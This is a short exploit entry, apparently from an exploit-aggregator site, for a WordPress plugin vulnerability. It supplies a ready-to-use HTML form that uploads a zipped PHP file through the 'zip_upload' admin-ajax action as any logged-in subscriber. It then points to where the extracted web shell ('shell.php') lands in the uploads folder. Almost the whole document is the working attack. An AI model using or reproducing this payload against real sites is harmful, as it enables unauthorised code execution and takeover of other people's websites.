## https://sploitus.com/exploit?id=WPEX-ID:64BD22E2-EA38-4B6F-BE54-E81F9E77BDC2
As any authenticated user, such as a simple subscriber
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="zip_upload"/>
Zipped PHP File
<input type="file" name="zipFile"/><br/><br/>
<input type="submit" value="Upload"/>
</form>
</body>
The extracted files will be in wp-content/uploads/YEAR/MONTH/, e.g: wp-content/uploads/2022/01/shell.php